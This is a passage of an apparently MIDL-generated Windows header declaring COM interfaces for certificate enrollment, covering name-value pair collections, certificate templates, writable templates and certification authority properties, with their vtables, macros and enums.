EXTERN_C const IID IID_IX509NameValuePairs;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab340-217d-11da-b2a4-000e7bbb2b09")
    IX509NameValuePairs : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePair **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509NameValuePair *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509NameValuePairsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509NameValuePairs * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509NameValuePairs * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509NameValuePairs * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509NameValuePairs * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePair **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509NameValuePairs * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509NameValuePairs * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ __RPC__in_opt IX509NameValuePair *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509NameValuePairs * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509NameValuePairs * This);
        
        END_INTERFACE
    } IX509NameValuePairsVtbl;

    interface IX509NameValuePairs
    {
        CONST_VTBL struct IX509NameValuePairsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509NameValuePairs_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509NameValuePairs_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509NameValuePairs_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509NameValuePairs_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509NameValuePairs_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509NameValuePairs_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509NameValuePairs_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509NameValuePairs_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509NameValuePairs_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509NameValuePairs_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509NameValuePairs_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509NameValuePairs_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509NameValuePairs_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509NameValuePairs_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0067 */
/* [local] */ 

typedef 
enum EnrollmentTemplateProperty
    {
        TemplatePropCommonName	= 1,
        TemplatePropFriendlyName	= 2,
        TemplatePropEKUs	= 3,
        TemplatePropCryptoProviders	= 4,
        TemplatePropMajorRevision	= 5,
        TemplatePropDescription	= 6,
        TemplatePropKeySpec	= 7,
        TemplatePropSchemaVersion	= 8,
        TemplatePropMinorRevision	= 9,
        TemplatePropRASignatureCount	= 10,
        TemplatePropMinimumKeySize	= 11,
        TemplatePropOID	= 12,
        TemplatePropSupersede	= 13,
        TemplatePropRACertificatePolicies	= 14,
        TemplatePropRAEKUs	= 15,
        TemplatePropCertificatePolicies	= 16,
        TemplatePropV1ApplicationPolicy	= 17,
        TemplatePropAsymmetricAlgorithm	= 18,
        TemplatePropKeySecurityDescriptor	= 19,
        TemplatePropSymmetricAlgorithm	= 20,
        TemplatePropSymmetricKeyLength	= 21,
        TemplatePropHashAlgorithm	= 22,
        TemplatePropKeyUsage	= 23,
        TemplatePropEnrollmentFlags	= 24,
        TemplatePropSubjectNameFlags	= 25,
        TemplatePropPrivateKeyFlags	= 26,
        TemplatePropGeneralFlags	= 27,
        TemplatePropSecurityDescriptor	= 28,
        TemplatePropExtensions	= 29,
        TemplatePropValidityPeriod	= 30,
        TemplatePropRenewalPeriod	= 31
    } 	EnrollmentTemplateProperty;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0067_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0067_v0_0_s_ifspec;

#ifndef __IX509CertificateTemplate_INTERFACE_DEFINED__
#define __IX509CertificateTemplate_INTERFACE_DEFINED__

/* interface IX509CertificateTemplate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("54244A13-555A-4e22-896D-1B0E52F76406")
    IX509CertificateTemplate : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in IX509CertificateTemplate * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        END_INTERFACE
    } IX509CertificateTemplateVtbl;

    interface IX509CertificateTemplate
    {
        CONST_VTBL struct IX509CertificateTemplateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplate_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplate_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateTemplates_INTERFACE_DEFINED__
#define __IX509CertificateTemplates_INTERFACE_DEFINED__

/* interface IX509CertificateTemplates */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplates;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79003-2181-11da-b2a4-000e7bbb2b09")
    IX509CertificateTemplates : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR bstrName,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOid( 
            /* [in] */ __RPC__in_opt IObjectId *pOid,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplatesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplates * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplates * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplates * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509CertificateTemplates * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in BSTR bstrName,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOid )( 
            __RPC__in IX509CertificateTemplates * This,
            /* [in] */ __RPC__in_opt IObjectId *pOid,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        END_INTERFACE
    } IX509CertificateTemplatesVtbl;

    interface IX509CertificateTemplates
    {
        CONST_VTBL struct IX509CertificateTemplatesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplates_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplates_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplates_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplates_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplates_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplates_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplates_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplates_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509CertificateTemplates_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509CertificateTemplates_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509CertificateTemplates_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509CertificateTemplates_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509CertificateTemplates_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509CertificateTemplates_get_ItemByName(This,bstrName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,bstrName,ppValue) ) 

#define IX509CertificateTemplates_get_ItemByOid(This,pOid,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOid(This,pOid,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplates_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0069 */
/* [local] */ 

typedef 
enum CommitTemplateFlags
    {
        CommitFlagSaveTemplateGenerateOID	= 1,
        CommitFlagSaveTemplateUseCurrentOID	= 2,
        CommitFlagSaveTemplateOverwrite	= 3,
        CommitFlagDeleteTemplate	= 4
    } 	CommitTemplateFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0069_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0069_v0_0_s_ifspec;

#ifndef __IX509CertificateTemplateWritable_INTERFACE_DEFINED__
#define __IX509CertificateTemplateWritable_INTERFACE_DEFINED__

/* interface IX509CertificateTemplateWritable */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplateWritable;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("F49466A7-395A-4e9e-B6E7-32B331600DC0")
    IX509CertificateTemplateWritable : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Commit( 
            /* [in] */ CommitTemplateFlags commitFlags,
            /* [in] */ __RPC__in BSTR strServerContext) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [in] */ VARIANT value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplateWritableVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplateWritable * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplateWritable * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplateWritable * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Commit )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ CommitTemplateFlags commitFlags,
            /* [in] */ __RPC__in BSTR strServerContext);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Property )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [in] */ VARIANT value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        END_INTERFACE
    } IX509CertificateTemplateWritableVtbl;

    interface IX509CertificateTemplateWritable
    {
        CONST_VTBL struct IX509CertificateTemplateWritableVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplateWritable_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplateWritable_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplateWritable_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplateWritable_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplateWritable_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplateWritable_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplateWritable_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplateWritable_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define IX509CertificateTemplateWritable_Commit(This,commitFlags,strServerContext)	\
    ( (This)->lpVtbl -> Commit(This,commitFlags,strServerContext) ) 

#define IX509CertificateTemplateWritable_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#define IX509CertificateTemplateWritable_put_Property(This,property,value)	\
    ( (This)->lpVtbl -> put_Property(This,property,value) ) 

#define IX509CertificateTemplateWritable_get_Template(This,ppValue)	\
    ( (This)->lpVtbl -> get_Template(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplateWritable_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0070 */
/* [local] */ 

typedef 
enum EnrollmentCAProperty
    {
        CAPropCommonName	= 1,
        CAPropDistinguishedName	= 2,
        CAPropSanitizedName	= 3,
        CAPropSanitizedShortName	= 4,
        CAPropDNSName	= 5,
        CAPropCertificateTypes	= 6,
        CAPropCertificate	= 7,
        CAPropDescription	= 8,
        CAPropWebServers	= 9,
        CAPropSiteName	= 10,
        CAPropSecurity	= 11,
        CAPropRenewalOnly	= 12
    } 	EnrollmentCAProperty;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0070_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0070_v0_0_s_ifspec;

#ifndef __ICertificationAuthority_INTERFACE_DEFINED__
#define __ICertificationAuthority_INTERFACE_DEFINED__

/* interface ICertificationAuthority */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificationAuthority;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("835D1F61-1E95-4bc8-B4D3-976C42B968F7")
    ICertificationAuthority : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentCAProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificationAuthorityVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificationAuthority * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificationAuthority * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificationAuthority * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
